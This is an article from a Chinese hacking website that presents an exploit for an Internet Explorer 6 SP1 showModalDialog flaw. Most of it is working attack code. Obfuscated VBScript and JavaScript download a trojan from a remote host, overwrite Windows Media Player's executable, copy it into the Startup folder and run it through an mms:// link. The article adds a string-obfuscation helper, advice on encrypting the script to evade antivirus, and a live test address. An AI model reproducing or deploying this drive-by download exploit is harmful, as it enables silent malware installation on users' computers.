 |
  |
|
| 首页 | 技术文章 | 软件下载 | 博客 | 论坛 | 精品教程 | 黑客动画 | 视频资源 | 在线服务 | 黑客游戏 | | ||||
 |
|
|||||||
|
||||||||
|
|||||
| IE6sp1 showModalDialog方法远程文件下载执行漏洞分析 | |||||
作者:czy 文章来源:http://czy82.mblogger.cn/ 点击数: 更新时间:2005-2-19  |
|||||
|
location="javascript:'<script>document.write(\"<script language=vbs>document.write chr(60)+chr(73)+chr(70)+chr(82)+chr(65)+chr(77)+chr(69)+chr(32)+chr(73)+chr(68)+chr(61)+chr(109)+chr(121)+chr(105)+chr(102)+chr(114)+chr(97)+chr(109)+chr(101)+chr(32)+chr(83)+chr(82)+chr(67)+chr(61)+chr(39)+chr(97)+chr(98)+chr(111)+chr(117)+chr(116)+chr(58)+chr(98)+chr(108)+chr(97)+chr(110)+chr(107)+chr(39)+chr(32)+chr(87)+chr(73)+chr(68)+chr(84)+chr(72)+chr(61)+chr(52)+chr(48)+chr(32)+chr(72)+chr(69)+chr(73)+chr(71)+chr(72)+chr(84)+chr(61)+chr(52)+chr(48)+chr(62)+chr(60)+chr(47)+chr(73)+chr(70)+chr(82)+chr(65)+chr(77)+chr(69)+chr(62):myiframe.document.write "+p+"<\\\\\/script>\");<\/script>'"; 这儿要注意的是myiframe中的iframe我用了同样的名字,其实名字不一样也行! 第三步:在新的myiframe中的该写入什么代码呢? set x = createObject("Microsoft.XMLHTTP") x.Open "GET", "http://192.168.0.18/WINVER.exe",0 x.Send set s = createObject("ADODB.Stream") s.Mode = 3 s.Type = 1 s.Open s.Write x.responseBody p="C:\Program Files\Windows Media Player\wmplayer.exe" s.SaveToFile p,2 p=replace (p,"wm","m") p=replace (p,"er.","er2.") s.SaveToFile p,2 s.SaveToFile "C:\Documents and Settings\Default User\「开始」菜单\程序\启动\wmplayer.exe",2 location.href = "mms://" 分析:先利用xmlhttp对象下载我们的木马,然后利用adodb.stream以覆盖方式写wmplayer.exe然后 改变location.href的值为mms这样就会调用我们的wmplayer.exe(mp9.0)或是mplayer2.exe(mp6.0) 或是写入启动菜单下次启动的时候执行. 由于单又引号的转化我使用了 -----------------------------chg.htm----------------- <script language=vbs> 'str="<IFRAME ID=myiframe SRC='about:blank' WIDTH=40 HEIGHT=40></IFRAME>" 'str="http://127.0.0.1/W.e" 'str="C:\Program Files\Windows Media Player\wmplayer.exe" str="http://www.chinansl.com/czy/w.e" for i=1 to len(str) document.write "chr("+cstr(asc(mid(str,i,1)))+")+" next </script> --------------------------------end---------------------- 完整代码如下: -----------------------------------------instal.htm-------------------- <html> <body> <script language=vbs> window.open "mdd.htm","_blank","top:0;left:0;height=100pix;width=100pix" </script> <script language="Javascript"> function InjectedDuringRedirection(){ var p="\\\\\"<script language=vbs>set x = createObject(chr(77)+chr(105)+chr(99)+chr(114)+chr(111)+chr(115)+chr(111)+chr(102)+chr(116)+chr(46)+chr(88)+chr(77)+chr(76)+chr(72)+chr(84)+chr(84)+chr(80)):x.Open chr(71)+chr(101)+chr(116),chr(104)+chr(116)+chr(116)+chr(112)+chr(58)+chr(47)+chr(47)+chr(119)+chr(119)+chr(119)+chr(46)+chr(99)+chr(104)+chr(105)+chr(110)+chr(97)+chr(110)+chr(115)+chr(108)+chr(46)+chr(99)+chr(111)+chr(109)+chr(47)+chr(99)+chr(122)+chr(121)+chr(47)+chr(119)+chr(46)+chr(101),0:x.Send:set s=createobject(chr(97)+chr(100)+chr(111)+chr(100)+chr(98)+chr(46)+chr(115)+chr(116)+chr(114)+chr(101)+chr(97)+chr(109)):with s:.mode=3:.type=1:.open:.write x.responseBody:.savetofile chr(67)+chr(58)+chr(92)+chr(80)+chr(114)+chr(111)+chr(103)+chr(114)+chr(97)+chr(109)+chr(32)+chr(70)+chr(105)+chr(108)+chr(101)+chr(115)+chr(92)+chr(87)+chr(105)+chr(110)+chr(100)+chr(111)+chr(119)+chr(115)+chr(32)+chr(77)+chr(101)+chr(100)+chr(105)+chr(97)+chr(32)+chr(80)+chr(108)+chr(97)+chr(121)+chr(101)+chr(114)+chr(92)+chr(119)+chr(109)+chr(112)+chr(108)+chr(97)+chr(121)+chr(101)+chr(114)+chr(46)+chr(101)+chr(120)+chr(101),2:end with:location.href =chr(109)+chr(109)+chr(115)+chr(58)+chr(47)+chr(47)\\\\\""+"+chr(60)+chr(47)+chr(115)+chr(99)+chr(114)+chr(105)+chr(112)+chr(116)+chr(62)"; showModalDialog('md.htm',window,"resizable:no\;dialogHide:on\;status:no\;help:no\;dialogTop:500\;dialogLeft:200\;dialogHeight:1\;dialogWidth:1\;").location="javascript:'<script>document.write(\"<script language=vbs>document.write chr(60)+chr(73)+chr(70)+chr(82)+chr(65)+chr(77)+chr(69)+chr(32)+chr(73)+chr(68)+chr(61)+chr(109)+chr(121)+chr(105)+chr(102)+chr(114)+chr(97)+chr(109)+chr(101)+chr(32)+chr(83)+chr(82)+chr(67)+chr(61)+chr(39)+chr(97)+chr(98)+chr(111)+chr(117)+chr(116)+chr(58)+chr(98)+chr(108)+chr(97)+chr(110)+chr(107)+chr(39)+chr(32)+chr(87)+chr(73)+chr(68)+chr(84)+chr(72)+chr(61)+chr(52)+chr(48)+chr(32)+chr(72)+chr(69)+chr(73)+chr(71)+chr(72)+chr(84)+chr(61)+chr(52)+chr(48)+chr(62)+chr(60)+chr(47)+chr(73)+chr(70)+chr(82)+chr(65)+chr(77)+chr(69)+chr(62):myiframe.document.write "+p+"<\\\\\/script>\");<\/script>'"; } </script> <script language="javascript"> setTimeout("myiframe.execScript(InjectedDuringRedirection.toString())",100); //生成函数代码toStirng()得到代码 setTimeout("myiframe.execScript('InjectedDuringRedirection()') ",101); //调用函数 document.write('<IFRAME ID=myiframe NAME=myiframe SRC="http://www.chinansl.com/czy/re.asp" WIDTH=0 HEIGHT=0></IFRAME>'); </script> </body> <pre> #--------------------# # # IE6sp1 new bug # # # 2004.06.10 # # by czy # # #--------------------# # </pre> </html> ----------------------------------end----------------------------- 第四步:遇到的一些问题: 1)如何找一个本地肯定存在的帮助文件: C:\WINDOWS\Help\iexplore.chm::/iegetsrt.htm 这是XP中,2000中为 C:\WINNT\Help\iexplore.chm::/iegetsrt.htm 2)木马可以放在什么地方呢? 如果不用马上执行的话也可以试试启动目录啊. 3)洞洞对98有用吗?98中没有adodb.stram对象所以没有用. 4)加密? 是啊现在杀毒的东东越来越多,可以使用wse对脚本加一下密. 5)要执行程序只能调用mms吗? 通过location.href的办法来执行程序真是一个巧妙的办法啊,不过老外 最早是通过覆盖wmplayer.exe然后location.href设为mms://来调用的 这儿有一个问题是如果系统中装了其它的插放软件或是media player装的 版本不一样的话可能失败,所以我想到了覆盖programe files下的msimn.exe然后 location.href设为news,当然还有一些其它的变通办法. 测试地址:www.chinansl.com/czy/instal.htm (只对2k有效) |
|||||
| 文章录入:IceRiver 责任编辑:IceRiver | |||||
| 【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】 | |||||
| 最新热点 | 最新推荐 | 相关文章 | ||
| 破解Session cookie的方法 浏览器市场IE份额跌至63.9% 不怕被钓鱼 关掉IE 7反钓鱼功 轻轻松松铲除恶意网站 实战I 安全专家:Web 2.0站点的coo 永远不怕IE主页被修改 IE仍然是过去影响力最高的科 Firefox和IE曝严重安全漏洞 IE和Firefox混着用易遭黑客攻 请小心你的IE浏览器主页被恶 |
 网友评论:(只显示最新5条。评论内容只代表网友观点,与本站立场无关!) |
 |
|
| 关于我们 - 版权声明 - 帮助(?) - 广告服务 - 联系我们 - 友情链接 - 用户注册 - | Powered by ICE RIVER - STUDIO |
|
|
| » CnXHacker.CoM |  |
© CopyRight 2002-2006, CnXHacker.CoM™, Inc. All Rights Reserved. |
